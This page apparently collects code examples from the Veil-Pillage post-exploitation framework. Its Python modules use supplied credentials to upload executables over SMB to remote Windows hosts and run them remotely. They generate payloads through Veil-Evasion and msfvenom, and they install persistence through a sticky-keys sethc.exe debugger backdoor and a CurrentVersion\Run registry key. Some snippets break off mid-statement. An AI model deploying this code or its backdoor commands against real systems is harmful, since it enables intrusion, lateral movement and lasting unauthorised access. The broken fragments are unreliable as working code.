Exemple #1
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        # grab our options
        triggerMethod = self.required_options["trigger_method"][0]
        out_file = self.required_options["out_file"][0]
        args = self.required_options["args"][0]

        if "\\" not in out_file:
            # otherwise assume it's an absolute path
            out_file = "C:\\Windows\\Temp\\" + out_file 

        # command to invoke netview and output it to a temporary file
        exePath = settings.VEIL_PILLAGE_PATH+"/data/misc/netview.exe"

        # the command to invoke netview.exe
        cmd = "C:\\Windows\\Temp\\netview.exe -o " + out_file

        # see if there are any extra arguments we want to add in
        if args != "none":
            cmd = cmd + " " + args

        for target in self.targets:
            # upload the binary to the host at C:\Windows\Temp\
            smb.uploadFile(target, username, password, "C$", "\\Windows\\Temp\\", exePath)
            # execute netview.exe
            command_methods.executeCommand(target, username, password, cmd, triggerMethod)

            self.output += "[*] netview.exe uploaded and executed using creds '"+username+":"+password+"' on "+target+" using "+triggerMethod+"\n"
Exemple #2
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        # grab our options
        triggerMethod = self.required_options["trigger_method"][0]
        out_file = self.required_options["out_file"][0]
        args = self.required_options["args"][0]

        if "\\" not in out_file:
            # otherwise assume it's an absolute path
            out_file = "C:\\Windows\\Temp\\" + out_file

        # command to invoke netview and output it to a temporary file
        exePath = settings.VEIL_PILLAGE_PATH + "/data/misc/netview.exe"

        # the command to invoke netview.exe
        cmd = "C:\\Windows\\Temp\\netview.exe -o " + out_file

        # see if there are any extra arguments we want to add in
        if args != "none":
            cmd = cmd + " " + args

        for target in self.targets:

            # upload the binary to the host at C:\Windows\Temp\
            smb.uploadFile(target, username, password, "C$",
                           "\\Windows\\Temp\\", exePath)

            # execute netview.exe
            command_methods.executeCommand(target, username, password, cmd,

            self.output += "[*] netview.exe uploaded and executed using creds '" + username + ":" + password + "' on " + target + " using " + triggerMethod + "\n"
def uploadTrigger(targets, username, password, exePath, triggerMethod="wmis", exeArgs=""):
    Take a particular exe at "exePath" path and uploads it to each 
    target in targets, using the specified username and password.

    The specified triggerMethod (default wmis) is then used to trigger the
    uploaded executable.


    # if we get a single target, make it into a list
    if type(targets) is str:
        targets = [targets]

    # randomize the uploaded .exe file name
    uploadFileName = helpers.randomString() + ".exe"

    # copy the payload to the random hostedFileName in the temp directory
    os.system("cp "+exePath+" /"+settings.TEMP_DIR+"/"+uploadFileName)

    # command to trigger the uploaded executable
    cmd = "C:\\Windows\\Temp\\"+uploadFileName+" "+exeArgs

    for target in targets:
        # upload the binary to the host at C:\Windows\Temp\
        smb.uploadFile(target, username, password, "C$", "\\Windows\\Temp\\", settings.TEMP_DIR+"/"+uploadFileName, 5)
        # execute the trigger command
        command_methods.executeCommand(target, username, password, cmd, triggerMethod)

    # return the randomized name in the calling method later wants
    # to clean the processes up
    return uploadFileName
Exemple #4
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]

        # command to invoke finddllhijack and output it to a temporary file
        exePath = settings.VEIL_PILLAGE_PATH+"/data/misc/finddllhijack.exe"
        cmd = "C:\\Windows\\Temp\\finddllhijack.exe"

        for target in self.targets:
            # upload the binary to the host at C:\Windows\Temp\
            smb.uploadFile(target, username, password, "C$", "\\Windows\\Temp\\", exePath)
            # execute finddllhijack and get the results
            out = command_methods.executeResult(target, username, password, cmd, triggerMethod, pause=5)
            # cleanup 
            command_methods.executeCommand(target, username, password, "del C:\\Windows\\Temp\\finddllhijack.exe", triggerMethod)

            # save the file off to the appropriate location
            saveFile = helpers.saveModuleFile(self, target, "finddllhijack.txt", out)

            if out != "":
                self.output += "[*] FindDllHijack results for "+target+" stored at "+saveFile+"\n"
                self.output += "[!] FindDllHijack failed for "+target+" : no result file\n"
def uploadTrigger(targets,
    Take a particular exe at "exePath" path and uploads it to each 
    target in targets, using the specified username and password.

    The specified triggerMethod (default wmis) is then used to trigger the
    uploaded executable.


    # if we get a single target, make it into a list
    if type(targets) is str:
        targets = [targets]

    # randomize the uploaded .exe file name
    uploadFileName = helpers.randomString() + ".exe"

    # copy the payload to the random hostedFileName in the temp directory
    os.system("cp " + exePath + " /" + settings.TEMP_DIR + "/" +

    # command to trigger the uploaded executable
    cmd = "C:\\Windows\\Temp\\" + uploadFileName + " " + exeArgs

    for target in targets:
        # upload the binary to the host at C:\Windows\Temp\
        smb.uploadFile(target, username, password, "C$", "\\Windows\\Temp\\",
                       settings.TEMP_DIR + "/" + uploadFileName, 5)

        # execute the trigger command
        command_methods.executeCommand(target, username, password, cmd,

    # return the randomized name in the calling method later wants
    # to clean the processes up
    return uploadFileName
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]

        # command to invoke finddllhijack and output it to a temporary file
        exePath = settings.VEIL_PILLAGE_PATH + "/data/misc/finddllhijack.exe"
        cmd = "C:\\Windows\\Temp\\finddllhijack.exe"

        for target in self.targets:

            # upload the binary to the host at C:\Windows\Temp\
            smb.uploadFile(target, username, password, "C$",
                           "\\Windows\\Temp\\", exePath)

            # execute finddllhijack and get the results
            out = command_methods.executeResult(target,

            # cleanup
                target, username, password,
                "del C:\\Windows\\Temp\\finddllhijack.exe", triggerMethod)

            # save the file off to the appropriate location
            saveFile = helpers.saveModuleFile(self, target,
                                              "finddllhijack.txt", out)

            if out != "":
                self.output += "[*] FindDllHijack results for " + target + " stored at " + saveFile + "\n"
                self.output += "[!] FindDllHijack failed for " + target + " : no result file\n"
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]
        uploadName = self.required_options["upload_name"][0]

        # if we're using Veil-Evasion for payload generation
        if self.required_options["exe_path"][0].lower() == "veil":

            # create a Veil-Evasion controller object for payload generation
            con = controller.Controller()

            # check various possibly flags passed by the command line

            # if we don't have payload specified, jump to the main controller menu
            if not self.args.p:
                payloadPath = con.MainMenu()
            # otherwise, set all the appropriate payload options
                # pull out any required options from the command line and
                # build the proper dictionary so we can set the payload manually
                options = {}
                if self.args.c:
                    options['required_options'] = {}
                    for option in self.args.c:
                        name,value = option.split("=")
                        options['required_options'][name] = [value, ""]

                # pull out any msfvenom shellcode specification and msfvenom options
                if self.args.msfpayload:
                    options['msfvenom'] = [self.args.msfpayload, self.args.msfoptions]

                # manually set the payload in the controller object
                con.SetPayload(self.args.p, options)

                # generate the payload code
                code = con.GeneratePayload()

                # grab the generated payload .exe name
                payloadPath = con.OutputMenu(con.payload, code, showTitle=True, interactive=False)

            # nicely print the title and module name again (since Veil-Evasion trashes this)
            print " [*] Executing module: " + helpers.color(self.name) + "..."

            # sanity check if the user exited Veil-Evasion execution
            if not payloadPath or payloadPath == "":
                print helpers.color(" [!] No output from Veil-Evasion", warning=True)
                raw_input("\n [>] Press enter to continue: ")
                return ""

        # if we have a custom-specified .exe, use that instead
            payloadPath = self.required_options["exe_path"][0]

            # if the .exe path doesn't exist, print and error and return
            if not os.path.exists(payloadPath):
                print helpers.color("\n\n [!] Invalid .exe path specified", warning=True)
                raw_input("\n [>] Press enter to continue: ")
                return ""

        # make sure the name ends with ".exe"
        if not uploadName.endswith(".exe"):
            uploadName += ".exe"

        # copy the resulting binary into the temporary directory with the appropriate name
        os.system("cp "+payloadPath+" /tmp/"+uploadName)

        for target in self.targets:

            baseName = payloadPath.split("/")[-1]

            # upload the payload to C:\Windows\System32\
            smb.uploadFile(target, username, password, "C$", "\\Windows\\","/tmp/"+uploadName)            
            self.output += "[*] Binary '"+baseName+"' uploaded to C:\\Windows\\"+uploadName+" using creds '"+username+":"+password+"' on : " + target + "\n"

            # the registry command to set up the sethc stickkeys backdoor for the binary
            sethcCommand = "REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /f /v Debugger /t REG_SZ /d \"C:\\Windows\\"+uploadName+"\""

            # execute the sethc command and get the result
            sethcResult = command_methods.executeResult(target, username, password, sethcCommand, triggerMethod)

            if sethcResult == "":
                self.output += "[!] No result file, SETHC backdoor enable failed using creds '"+username+":"+password+"' on : " + target + "\n"
            elif "The operation completed successfully" in sethcResult:
                self.output += "[*] SETHC backdoor successfully enabled using creds '"+username+":"+password+"' on : " + target + "\n"

                # build our cleanup -> deleting this registry run value
                cleanupCMD = "REG DELETE \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /v Debugger /f"
                self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+cleanupCMD+"|"+triggerMethod+"\n"
Exemple #8
    def run(self):

        # assume single set of credentials
        username, password = self.creds[0]

        triggerMethod = self.required_options["trigger_method"][0]
        uploadName = self.required_options["upload_name"][0]
        key_name = self.required_options["key_name"][0]

        # if we're using Veil-Evasion for payload generation
        if self.required_options["exe_path"][0].lower() == "veil":

            # create a Veil-Evasion controller object for payload generation
            con = controller.Controller()

            # if we don't have payload specified, jump to the main controller menu
            if not self.args.p:
                payloadPath = con.MainMenu()
            # otherwise, set all the appropriate payload options
                # pull out any required options from the command line and
                # build the proper dictionary so we can set the payload manually
                options = {}
                if self.args.c:
                    options['required_options'] = {}
                    for option in self.args.c:
                        name, value = option.split("=")
                        options['required_options'][name] = [value, ""]

                # pull out any msfvenom shellcode specification and msfvenom options
                if self.args.msfpayload:
                    options['msfvenom'] = [
                        self.args.msfpayload, self.args.msfoptions

                # manually set the payload in the controller object
                con.SetPayload(self.args.p, options)

                # generate the payload code
                code = con.GeneratePayload()

                # grab the generated payload .exe name
                payloadPath = con.OutputMenu(con.payload,

            # nicely print the title and module name again (since Veil-Evasion trashes this)
            print " [*] Executing module: " + helpers.color(self.name) + "..."

            # sanity check if the user exited Veil-Evasion execution
            if not payloadPath or payloadPath == "":
                print helpers.color(" [!] No output from Veil-Evasion",
                raw_input("\n [>] Press enter to continue: ")
                return ""

        # if we have a custom-specified .exe, use that instead
            payloadPath = self.required_options["exe_path"][0]

            # if the .exe path doesn't exist, print and error and return
            if not os.path.exists(payloadPath):
                print helpers.color("\n\n [!] Invalid .exe path specified",
                raw_input("\n [>] Press enter to continue: ")
                return ""

        # make sure the name ends with ".exe"
        if not uploadName.endswith(".exe"):
            uploadName += ".exe"

        # copy the resulting binary into the temporary directory with the appropriate name
        os.system("cp " + payloadPath + " /tmp/" + uploadName)

        for target in self.targets:

            baseName = payloadPath.split("/")[-1]

            # upload the payload to C:\Windows\System32\
            smb.uploadFile(target, username, password, "C$", "\\Windows\\",
                           "/tmp/" + uploadName)
            self.output += "[*] Binary '" + baseName + "' uploaded to C:\\Windows\\" + uploadName + " using creds '" + username + ":" + password + "' on : " + target + "\n"

            # the registry command to set up the sethc stickkeys backdoor for the binary
            regCommand = "REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /f /v " + key_name + " /t REG_SZ /d \"C:\\Windows\\" + uploadName + "\""

            # execute the sethc command and get the result
            sethcResult = command_methods.executeResult(
                target, username, password, regCommand, triggerMethod)

            if sethcResult == "":
                self.output += "[!] No result file, CurrentVersion\\Run registry command failed using creds '" + username + ":" + password + "' on : " + target + "\n"
            elif "The operation completed successfully" in sethcResult:
                self.output += "[*] CurrentVersion\\Run successfully set using creds '" + username + ":" + password + "' on : " + target + "\n"
                # build our cleanup -> deleting this registry run value
                cleanupCMD = "REG DELETE \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v " + key_name + " /f"
                self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + cleanupCMD + "|" + triggerMethod + "\n"